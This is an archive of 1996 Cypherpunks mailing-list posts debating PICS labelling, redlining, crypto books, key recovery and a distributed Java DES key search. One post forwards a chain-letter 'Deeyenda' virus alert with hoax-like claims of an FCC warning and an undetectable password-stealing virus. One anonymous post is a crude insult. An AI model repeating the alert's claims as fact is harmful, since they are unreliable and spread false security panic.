> this on the PC. Another area where Mac's seem to be innovative...

The problem with running Igor's program on PC has to do with the last
allocation cluster of each file: it's in use (so this program won't
write over it), but it only has new data at the beginning, and might
contain some interesting old data at the end.

For the PCs, Norton Utilities (now from Symantec) include a wiping
utility that addresses the above problem. Specifially for OS/2 HPFS,
the Gammatech utility also include one.


---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Tue, 10 Dec 1996 06:44:57 -0800 (PST)
To: jbaber@mi.leeds.ac.uk
Subject: Re: PICS is not censorship
In-Reply-To: <4484.9612101411@misun2.mi.leeds.ac.uk>
Message-ID: <32AD772D.589B@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


jbaber@mi.leeds.ac.uk wrote:
> 
> Not having a detailed knowledge of the American right to free 
> speach I can only go on my opinions, but lieing with the intent 
> to defraud would almost certainly be illegal over here. 

So where lies intent to defraud in the act of deliberately 
mislabeling a web page?  Why is that any different from me 
standing on the street corner (or at Hyde Park Corner) announcing
that I'm the Messiah?

-- 
^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^
Mike McNally -- Egregiously Pointy -- Tivoli Systems, "IBM" -- Austin
mailto:m5@tivoli.com    mailto:m101@io.com    http://www.io.com/~m101
^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 10 Dec 1996 06:06:14 -0800 (PST)
To: Huge Cajones Remailer <nobody@huge.cajones.com>
Subject: Re: Redlining
In-Reply-To: <199612100815.AAA09236@mailmasher.com>
Message-ID: <Pine.SUN.3.94.961210090234.4477A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 10 Dec 1996, Huge Cajones Remailer wrote:

> Date: Tue, 10 Dec 1996 00:15:30 -0800
> From: Huge Cajones Remailer <nobody@huge.cajones.com>
> To: cypherpunks@toad.com
> Subject: Re: Redlining
> 
> 
> I seem to have upset you, Matt Miszewski, and I am sorry for that.  It
> appears to me that the problem we have is that we have different ideas
> about what is right and different perceptions of the nature of the
> world.
> 
> It may appear that I intentionally put words in your mouth.  This is
> not the case.  We have different ideas about what is obvious.  I have
> made assumptions, but they seemed clear to me.  Apparently, they were
> not.  We may still have a fruitful discussion.
> 
> At 4:17 PM 12/9/1996, Matthew J. Miszewski wrote:
> >At 03:14 PM 12/4/96 EST, Bovine Remailer wrote:
> >>At 11:26 AM 12/4/1996, Matthew J. Miszewski wrote:
> >[snippo]
> >>If I earned my very own money honestly and I choose to lend it only to
> >>Albanians, you believe that this would be inefficient and, therefore,
> >>forbidden.  
> >
> >Actually I didnt say anything about private lending.  But as this thread
> >goes on you seem to assume much.
> 
> I am assuming that you agree that somebody who has earned their money
> honestly should be able to lend it to whomever they please for
> whatever reason they like.  You call this private lending.  (Please
> correct me if I am wrong.)
> 
> I believe that five friends should be able to get together, pool their
> resources, and lend their money to whomever they like.
> 
> I believe that ten, or a hundred, or a thousand people should be able
> to pool their money and lend it to whomever they please for whatever
> reason they like.
> 
> That, essentially, is what a bank is.  I do not believe the government
> should dictate which people you, or your bank, are allowed to lend to.


Create a bank where the identity of the customers are unknown and you
solve the redlining problem.

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 10 Dec 1996 08:22:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Codebreakers on the shelves!
In-Reply-To: <v03007806aed2ec6f864a@[207.167.93.63]>
Message-ID: <1c7PyD98w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy C. May" <tcmay@got.net> writes:
> As near as I can tell, from the comments by Kahn and from looking at it,
> the new edition is _exactly_ the same as the 1967 edition, with the
> exception of one additional chapter. The last chapter covers the Enigma
> story in detail.
>
> However, the public key cryptography revolution is covered in about two or
> three pages (or at least this is my recollection). Brief mention is made of
> Diffie, Hellman, etc., but nothing surprising or new.

The "cypher punks" mailing list isn't even mentioned, whines Timmy.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbaber@mi.leeds.ac.uk
Date: Tue, 10 Dec 1996 01:39:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PICS is not censorship
Message-ID: <4396.9612100936@misun2.mi.leeds.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


Tim May <tcmay@mail.got.net> writes: 
> At 3:52 PM -0800 12/8/96, Lucky Green wrote:
> >Let's put the question if something like PICS will be mandated aside for
> >the moment. Do you agree that sites that deliberately mislabel their
> >content, will eventually face legal action? If so, then PICS should not be
> >considered truly voluntary.

I disagree, mandating labeling is a completely separate thing from deliberately
mislabeling. No one could force me into entering into a contract with them,
but if I chose to then it would, and very probably should, be enforceable.

> If I believe pictures of people having sex should be marked "Suitable for
> all ages" (or whatever the Official PICS Status Code is) will I be
> criminally or civilly in danger? If so, then PICS is a ratings system which
> individuals are likely to be unable to interpret themselves.

What if the PICS classifications were worded so as to describe the factual
content of a page rather than the writers opinion of its suitability? This,
if correctly implemented, could remove the problem of interpretation.

> (This takes the element of intent to deliberately defeat PICS out of the
> equation, and asks if "innocent mislabeling" or "philosophical disagreement
> alternate labeling" will expose the mislabeller to charges.

Factual classifications should completely remove the problems of innocent 
mislabeling and philosophical disagreement (if you disagree don't label but
if you use our labels follow our rules). I would never claim to be a lawyer 
but from my naive point of view I would say that putting false labels on a
page would be misrepresenting it and could possibly constitute fraud?

Take for example a page labeled with the <Topless> factual tag, that charged
for access. Surely a user could, at the very least claim that false 
advertising got him to (pay to) view the page if he was searching for Topless
pictures?

> What I see with any such enforcement of PICS standards is yet another Full
> Employment Act for Lawyers, and the Lawyer's Guild will be oh so happy to
> see PICS essentially made part of the bureacratic morass:
>
> "Due to the complexities of the PICS ratings system, and varying community
> interpretations of the elements of PICS, we advise that no person post
> anything to the Net with a PICS rating without seeking competent legal
> advice from a PICS-licensed legal professional."

Unfortunately this may be the case, however I would suspect that this may go
the other way with people thinking that if they can be sued for mislabeling
their pages they just will not label them at all.

Jon Baber
jbaber@mi.leeds.ac.uk
http://chem.leeds.ac.uk/ICAMS/people/jon/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Elizabeth Schwartz <betsys@cs.umb.edu>
Date: Tue, 10 Dec 1996 06:41:04 -0800 (PST)
To: tcmay@got.net (Timothy C. May)
Subject: Re: Codebreakers on the shelves!
In-Reply-To: <v03007806aed2ec6f864a@[207.167.93.63]>
Message-ID: <199612101440.JAA19770@terminus.cs.umb.edu>
MIME-Version: 1.0
Content-Type: text/plain


I've been looking for a used copy for over a year so I was happy to find
the new edition! I *was* disappointed by the last chapter, althouh I know
that historians hate to make early judgements about which current events
are important.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pfarrell@cybercash.com
Date: Tue, 10 Dec 1996 09:56:29 -0800 (PST)
Subject: No Subject
Message-ID: <199612101756.JAA22373@toad.com>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 10 Dec 1996 09:57:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Puzzle Palace 2nd edition (1983) Info
In-Reply-To: <3.0.1.32.19961209211613.010dc81c@mail.teleport.com>
Message-ID: <v03007801aed355c568a9@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:48 AM -0800 12/10/96, Alan Olsen wrote:
>I remember that there was some confusion as to the second edition of _The
>Puzzle Palace_ by Bamford.  (Sorry if this info has been posted before.  I
>did not see a resolution to it.  I may have missed it if it was.)
>
>"I found a copy of _The Puzzle Palace_ 2nd edition!", he said crypticly.
>
>In the Penguin Press printing of _The Puzzle Palace_, it notes that there
>is the 1982 edition (published by Houghton Mifflin) and one in 1983
>(published by Penguin) with a new afterward.  Since the afterward contains
>a fair amount of new information (it looks like a number of FOIA requests
>came in after going to press), it is probibly the "Second Edition" of which
>Schneier speaks...
>
>Hope that clears things up...

No, I fear you are _confusing_ people with this comment.

Yes, there was a 1983 paperbound edition, with a few new items added to the
1982 orginal. Ho hum. (I have both, and have for many years. It was finding
the '92 edition that sparked much of my interest in the NSA, back in 1982.)

What we are waiting for is the _real_ Second Edition, the long-awaited
revising of "The Puzzle Palace." It is expected later this year or next.

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 10 Dec 1996 10:08:59 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PICS is not censorship
In-Reply-To: <4484.9612101411@misun2.mi.leeds.ac.uk>
Message-ID: <v03007802aed357c3e05d@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:43 AM -0600 12/10/96, Mike McNally wrote:
>jbaber@mi.leeds.ac.uk wrote:
>>
>> Not having a detailed knowledge of the American right to free
>> speach I can only go on my opinions, but lieing with the intent
>> to defraud would almost certainly be illegal over here.
>
>So where lies intent to defraud in the act of deliberately
>mislabeling a web page?  Why is that any different from me
>standing on the street corner (or at Hyde Park Corner) announcing
>that I'm the Messiah?

This was, of course, my point about there being no universally valid truth,
and what such anti-fraud statutes must mean about religions.

Basically, "free speech" entails a kind of anarchy (= no law) with regard
to truths and falsehoods. As I like to say, "at most, one religion is
correct" (with the other 783 major sects clearly spouting falsehoods...and
probably _all_ 784 major sects doing so).

If PICS codes are ever mandated, this will be placing the legal system and
governments in the business of deciding truth.

The meta-point I am making is not about truth and religion, but about this
business of insisting that people label their words by some criteria.
Speech should not require prior approval by a standards body, or
self-labelling.

(And, to repeat, any such labelling implies standards of truth that simply
don't exist.)

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Tue, 10 Dec 1996 01:17:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Codebreakers on the shelves!
Message-ID: <9612100917.AA00662@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Tue Dec 10 10:16:58 1996
>> Warning:  The book is $65.00 hardbound!  (It is also *NOT* a small
>> book. It is large.  About 2000 pages by my guess.
> 1181 actually, not including the table of contents and preface.

It's available in swiss bookstores for $49. I'm about to get one :)

- ------< fate favors the prepared mind >------
Remo Pini                        rp@rpini.com
PGP:  http://www.rpini.com/crypto/crypto.html
- ----< words are what reality is made of >----
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv
Comment: http://www.rpini.com/crypto/crypto.html

iQEVAwUBMq0qjRFhy5sz+bTpAQER8Af8DviUdSvXhR1Ue7mMJY5/RndZjrTTEdU3
aMEkm7+Xly4ChN62CvKfiBwPjU/eYaEWPiC7YTYGJxe1tSnUoA4K0SHShPAmGI0M
vj0/YlaST2/eSwm0m9bu9pcQLEGqX0w/ZsVHPliqTfjcA2k4c6feQg0ku0Ddfija
x5y3MfkKoSGohbF96LQ6+KTJkKJuxnHZnRYPFUiXZCS5+CQHqK1I9VAGzeyF+7th
Wj0vNif7oUBWH7Qssib380FQj5GtVN0IH/Z/vdcFBrxlXMPRqHWDVmPuIB2BTd2p
6aF4ioF4IUPKTydxJ4ZIVIyh9mV3QHQeJE1hbBb4AoDpxBp0Mrn7Cg==
=Ek6e
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Tue, 10 Dec 1996 10:27:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: Diffie-Hellman Mayonnaise
Message-ID: <199612101825.KAA20242@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tim Mayonnaise is just a poor excuse for an unschooled, retarded thug.

    ___
   <*,*> Tim Mayonnaise
   [`-']
   ' - '





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Tue, 10 Dec 1996 10:31:00 -0800 (PST)
To: jbaber <jbaber@mi.leeds.ac.uk>
Subject: Re: PICS is not censorship
Message-ID: <9612101829.AA10141@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


Are you people trying to bait us Mormons again? :)

    Ryan

---------- Previous Message ----------
To: cypherpunks
cc: jbaber
From: jbaber @ mi.leeds.ac.uk @ smtp
Date: 12/10/96 03:29:34 PM
Subject: Re: PICS is not censorship

Mike McNally <m5@vail.tivoli.com> writes: 
> jbaber@mi.leeds.ac.uk wrote:
> > 
> > Not having a detailed knowledge of the American right to free 
> > speach I can only go on my opinions, but lieing with the intent 
> > to defraud would almost certainly be illegal over here. 
> 
> So where lies intent to defraud in the act of deliberately 
> mislabeling a web page?  Why is that any different from me 
> standing on the street corner (or at Hyde Park Corner) announcing
> that I'm the Messiah?

I seem to have edited the previous message badly and left out the
context which was false labeling on pages for which there was a 
charge to view. More along the lines of false advertising to be sure
but still fraud in my opinion.

Also, of course, it would be very hard to show that you were not,
in fact, the Messiah (;->).

Jon Baber
jbaber@mi.leeds.ac.uk
http://chem.leeds.ac.uk/ICAMS/people/jon







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Byrd <byrd@ACM.ORG>
Date: Tue, 10 Dec 1996 07:49:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Patriots should use PGP
Message-ID: <3.0.32.19961210104240.006dd358@super.zippo.com>
MIME-Version: 1.0
Content-Type: text/plain


Why on earth would an American football team need PGP?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 10 Dec 1996 08:31:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PICS is not censorship
In-Reply-To: <v03007807aed2edd5da77@[207.167.93.63]>
Message-ID: <ePaqyD101w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy C. May" <tcmay@got.net> writes:

> (For starters, religions--all of them--will have to be shut down.)

So, what's your problem, Timmy?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 10 Dec 1996 08:59:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Redlining
In-Reply-To: <199612100815.AAA09236@mailmasher.com>
Message-ID: <DRaqyD102w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


This has no crypto-relevance...

nobody@huge.cajones.com (Huge Cajones Remailer) writes:
>
> I believe that five friends should be able to get together, pool their
> resources, and lend their money to whomever they like.
>
> I believe that ten, or a hundred, or a thousand people should be able
> to pool their money and lend it to whomever they please for whatever
> reason they like.
>
> That, essentially, is what a bank is.  I do not believe the government
> should dictate which people you, or your bank, are allowed to lend to.

Without government regulation, a bank would charge higher interest rates for
(e.g.) residential mortgages in neighborhoods where the bank thinks they have
more likelyhood of default and eventual foreclosure. This is no different from
life insurance companies charging smokers higher premiums because they think
that smokers die younger. A bank would not flatly refuse to lend money in a
certain neighborhood if they could charge an interest rate at which they would
still make money (with appropriate reserves for defaults). But because they
can't discriminate freely in setting the interest rate, the banks try to avoid
high-risk loans altogether.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Tue, 10 Dec 1996 08:23:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: Java DES breaker?
Message-ID: <Pine.SUN.3.91.961210112058.1282A-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


Here's a thought,

While Java isn't a workhorse performance wise, it's very simple for 
anyone with a half decent browser to use java applets.  Writing an 
implementation of DES in Java should be fairly easy, however it will run 
slow on most browsers.  This performance drop will make it far easier for 
Joe Webuser to easily help break DES for us.

Previous efforts at breaking DES and RSA have done quite well, but the 
number of people involved can be greatly increased if you tell someone 
just go to this page and leave your browser on overnight, every night.

The applets would get a key range from the server, process them, and 
return a yeah or nay back for however far they manage to process before 
the user returns in the morning.

With JIT's (Just In Time Compilers) and the sheer numbers of users that 
this can attract, the efforts at breaking weaker cyphers can be increased.

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    | "If  you're  gonna die,  die  with your|./|\.
..\|/..|sunder@sundernet.com|boots on;  If you're  gonna  try,  just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin,  |you're gonna die, you're gonna die!"    |.\|/.
.+.v.+.|God of screwdrivers"|  --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Internaut <unde0275@frank.mtsu.edu>
Date: Tue, 10 Dec 1996 10:13:20 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: RE: FIPS key recovery meeting
Message-ID: <01BBE693.53DB90E0@s24-pm03.tnstate.campus.mci.net>
MIME-Version: 1.0
Content-Type: text/plain


>Members mentioned a few cases where an employee was unable to decrypt >his 
files, but no one knew of a case where an organization was unable to
>obtain shared data (e.g., a database), because it was encrypted.  Other
>members seemed reluctant to accept his distinction.  They seem to view key
>recovery as a way to audit proper use of organization assets by employees,
>or to protect the organization from malicious acts of employees, or to
>recover data if a custodian is run over by a bus.

pretty funny!  think of all the loss of unrecoverable encrypted data from a 
custodian run over by a bus!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andis@taa.com (Andi Stewart)
Date: Tue, 10 Dec 1996 14:01:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: FW: **VIRUS ALERT***
Message-ID: <19961210205135940.AAA136@luka.taa.com>
MIME-Version: 1.0
Content-Type: text/plain


>Return-Path: <cdoss@taa.com>
>Received: from cdoss.taa.com ([204.140.196.68]) by taa.com
>          (post.office MTA v1.7.1.1 ID# 0-11167) with SMTP id AAA62;
>          Tue, 10 Dec 1996 11:48:10 -0800
>X-Sender: cdoss@204.140.196.66
>X-Mailer: Windows Eudora Version 1.4.4
>Mime-Version: 1.0
>Content-Type: text/plain; charset="us-ascii"
>Date: Tue, 10 Dec 1996 11:48:11 -0500
>To: andis@taa.com
>From: cdoss@taa.com (Carl Doss)
>Subject: FW: **VIRUS ALERT***
>Cc: bill.burbank@taa.com
>Message-ID: <19961210194810338.AAA62@cdoss.taa.com>
>
>>Return-Path: <Tom.Fillmore@Grubb-Ellis.com>
>>Received: from mail.grubb-ellis.com ([206.171.46.58]) by taa.com
>>          (post.office MTA v1.7.1.1 ID# 0-11167) with SMTP id AAA97
>>          for <cdoss@taa.com>; Tue, 10 Dec 1996 10:09:28 -0800
>>Received: by mail.grubb-ellis.com with SMTP (Microsoft Exchange Server
>Internet Mail Connector Version 4.0.993.5)
>>	id <01BBE682.370D0E00@mail.grubb-ellis.com>; Tue, 10 Dec 1996 10:09:22 -0800
>>Message-ID:
><c=US%a=_%p=Grubb-Ellis%l=PNW/CORPORATE/00027F83@mail.grubb-ellis.com>
>>From: "Fillmore, Tom" <Tom.Fillmore@Grubb-Ellis.com>
>>To: "'Carl Doss (NEW)'" <cdoss@taa.com>
>>Subject: FW: **VIRUS ALERT***
>>Date: Tue, 10 Dec 1996 09:56:21 -0800
>>Return-Receipt-To: <Tom.Fillmore@Grubb-Ellis.com>
>>X-Mailer:  Microsoft Exchange Server Internet Mail Connector Version 4.0.993.5
>>Encoding: 69 TEXT
>>
>>Danger, Will Robinson!!!
>>
>>>----------
>>>From: Paul.Goldenberg@cwi.cablew.com
>>>To: Frye, Doug; INTERNET-us2b7ak6 (052); INTERNET-shellyka (052);
>>>INTERNET-ORDNGaol (052); INTERNET-metracom (052); INTERNET-mdobiepf (052);
>>>INTERNET-KAGSEFao (052); INTERNET-HVoldtof (052); INTERNET-HAGERMAN (052);
>>>INTERNET-goldnson (052); INTERNET-georgebr (052); INTERNET-dmenkenw (052);
>>>INTERNET-ChrisShr (052); INTERNET-BSledzva (052); INTERNET-bnorwood (052);
>>>INTERNET-AGolden9 (052); INTERNET-8442po5n (052); INTERNET-498038OV (052)
>>>Subject: FW: **VIRUS ALERT***
>>>Date: Tuesday, December 10, 1996 1:20AM
>>>
>>>
>>>
>>>**********VIRUS ALERT**********
>>>
>>>VERY IMPORTANT INFORMATION, PLEASE
>>>READ!
>>>
>>>There is a computer virus that is being sent across the Internet.  Ifyou
>>>receive an email message with the subject line "Deeyenda", DO NOT
>>>read the message, DELETE it immediately! DO NOT OPEN !!!
>>>
>>>Some miscreant is sending email under the title "Deeyenda" nationwide,if
>>>you get anything like this DON'T DOWNLOAD THE FILE!  It has a virus that
>>>rewrites your hard drive, obliterates anything on it.  Please be careful
>>>and forward this e-mail to anyone you care about.
>>>
>>>Please read the message below.
>>>
>>>FCC WARNING!!!!! -----DEEYENDA PLAGUES INTERNET
>>>
>>>The Internet community has again been plagued by  another computer
>>>virus.  This message is being spread throughout the
>>>Internet, including USENET posting, EMAIL, and other Internet
>>>activities.  The reason for all
>>>the attention is because of the nature of this virus and the
>>>potential  security risk it makes.
>>>
>>>Instead of a destructive Trojan virus (like most viruses!), this
>>>virus, referred to as Deeyenda Maddick, performs a comprehensive
>>>search on your computer, looking for valuable
>>>information, such as email and login passwords, credit cards,
>>>personal info., etc.
>>>
>>>The Deeyenda virus also has the capability to stay memory resident
>>>while running a host of applications and operation systems, such
>>>as Windows 3.11 and Windows 95.  What this means to Internet users is
>>>that when a login and password are send to the server, this virus
>>>can copy this information and SEND IT OUT TO AN UNKNOWN ADDRESS
>>>(varies).
>>>
>>>The reason for this warning is because the Deeyenda virus is
>>>virtually undetectable.  Once attacked, your computer will be
>>>unsecure.  Although it can attack any O/S, this virus is most likely
>>>to attack those users viewing Java enhanced Web Pages
>>>(Netscape 2.0+ and Microsoft
>>>Internet Explorer 3.0+ which are running under Windows 95).
>>>
>>>Researchers at Princeton University have found this virus on a
>>>number of World Wide Web pages and fear its spread.
>>>
>>>Please pass this on, for we must alert the general public of the
>>>security risks.
>>>
>>>
>>>
>>>
>>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Tue, 10 Dec 1996 13:05:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Redlining
Message-ID: <199612102104.NAA32212@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain



At 9:04 AM 12/10/1996, Black Unicorn wrote:
>On Tue, 10 Dec 1996, Huge Cajones Remailer wrote:
>> I believe that ten, or a hundred, or a thousand people should be able
>> to pool their money and lend it to whomever they please for whatever
>> reason they like.
>> 
>> That, essentially, is what a bank is.  I do not believe the government
>> should dictate which people you, or your bank, are allowed to lend to.
>
>Create a bank where the identity of the customers are unknown and you
>solve the redlining problem.

I can imagine a bank whose depositors are not known.  I can also
imagine a bank which itself operates anonymously.

How would people borrow money against real estate and remain
anonymous?  It seems to me that the borrower cannot do so if the real
estate will act as collateral.

Also, how would an anonymous bank foreclose on a mortgage?

Red Rackham






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 10 Dec 1996 13:16:48 -0800 (PST)
To: cypherpunks@toad.com
Subject: The Sword of Damocles
Message-ID: <v03007800aed3793a331b@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



The recent discussion of the dangers of PICS--especially the dangers that a
widely-deployed PICS system might encourage/enable governments to mandate
PICS ratings in various ways--is just one of several "swords of Damocles"
we have talked about for several years.

By a "sword of Damocles" I mean any technology or system which, if
deployed, could present an almost overwhelming temptation for governments
or special interest groups to direct in directions most of us would find
highly objectionable and even dangerous.

(I use the metaphor of this sword of Damocles--the king of some place
placed Damocles under a sword suspended by the thinnest of threads, to
remind Damocles of who had the power--because no other metaphor seems to
fit as well. Another metaphor is that of the danger of any technology which
could become oppressive by the "flip of a switch." For example, if key
recovery becomes widespread, with limited numbers of recovery centers, then
governments could quite easily use administrative or executive orders to
limit the options available for choosing such centers, or the licensing
requirements for such centers...by the "stroke of a pen" ("flip of a a
switch," or "flag day" in computerese), the voluntary system becomes much
less voluntary. At the most extreme level, nearly all of us would object
mightily to any system in which cyanide release systems were installed in
our homes, no matter the assurances that the cyanide would only be released
if proper legal orders were gotten!))

Some of the debates over crypto policy have involved people who don't see
what the concern is about future actions, who basically trust the
government to keep a system voluntary when it was promised to be voluntary.
(David Sternlight comes to mind...from 1993 onward several of us just could
not convince him that the Clipper danger lay in the potential for key
escrow eventually being mandated...he just kept focussing on the
"voluntary" aspects of Clipper sales, and thought our criticism of Clipper
as an attempt to interfere with "free markets." Nonsense of course, but
because of the "sword of Damocles" concerns, not the particular situation
at some present instant.)

To make this issue clearer, I'll just list several sorts of examples. Not
all are the same, but the themes are similar.

1. An implantable ID device is developed for humans, along the lines of the
"Pet I.D." chips which are already gaining wide acceptance. (And which
we've discussed several times on this list. See archives or use Alta Vista,
etc.)

While such a "voluntary" system is "unexceptionable" to most civil
libertarians, in the sense that libertarians do not object to the
non-aggressive choices of others to do with their bodies as they please,
there are clearly some "sword of Damocles" concerns. For example, a
widely-used system of implants could be mandated first for schoolchildren
(gotta stop those kidnappings), then for released criminals (part of
parole), then for deadbeat dads (don't want them to flee), then for other
classes.

This is of course a serious issue, despite some marginalization in the
press as being primarily a concern of the religious Right and their
fixation on "the mark of the Beast."

2. Key Escrow, a la Clipper, the latest Key Recovery plans, etc. Even if
announced as "voluntary," as of course Clipper was, our concern was largely
with the "sword of Damocles" aspects, that the government appeared to be
interested in driving out non-escrow alternatives and widely-deploying a
nominally voluntary system which could, at the stroke of a pen, become
mandatory.

The various issues surrounding key escrow have been so well-covered I won't
repeat points here. This is just a classical sword of Damocles issue.

3. Government regulation in general. Anytime the government gains the power
to regulate some product class or industry, there is this sword of Damocles
effect. A recent example is the area of _vitamins_, with the vitamin and
health food store industry vigorously fighting proposals that the Food and
Drug Administration (FDA)  step in to the "vitamin anarchy" arena and place
restrictions on vitamins, advertising, licensing, etc.

The sword of Damocles comes from the very real possibility that initially
quite "reasonable" limits will "open the door" for later, more draconian
actions. (Whew, I've mixed a couple of metaphors with a couple of classical
Greek allusions. Sorry.)

4. Gun control. Gun _registration_ is almost the canonical sword of
Damocles, in terms of what gun rights folks fear the most. They know that
once the locations and quantities of guns are known, it is a much simpler
matter for some later government to order such guns turned in to be melted
down. It happened in the 1930s in Germany, it happened in other countries
more recently, and it is even happening with the U.S. military "disarming
the civilians" in places like Somalia, Bosnia, Zaire, and any other place
the U.S. military is sent in as a "peacekeeper."

(Note: In Somalia, the U.S. disarmed the "soft targets:: simple farmers who
had rifles they'd had in their families for generations. This had the
tragic effect of making these very farmers then easier prey for jeeploads
of looters and Somali "soldiers," who often followed the U.S.
"pacification" squads and looted the homes and farms of the now-disarmed
villagers! Some tradition for the U.S. to uphold, eh? No "right to keep and
bear arms" for the peasants we are supposedly there to help.)

Whatever one thinks of guns and gun rights, clearly this is a good example
of why registration is fought by so many people, even if "assurances" are
given that the registration has nothing to do with confiscation. (Right.)

5. "Voluntary self-ratings." The PICS discussion, and earlier discussions
of "voluntary self-ratings" of CDs, videos, and other entertainment, brings
up these same issues of Damoclean swords. Could a nominally voluntary
ratings system be mandated by the courts, or by Congress?

Depending on the outcome of the CDA case, I think so. If the Supreme Court
upholds the CDA, it could be argued that anyone who fails to voluntarily
self-label his speech faces sanctions if anyone finds his speech in
violation of community standards, blah blah. (If one's speech is
"non-explicit," as, say, this post of mine is here, then of course it
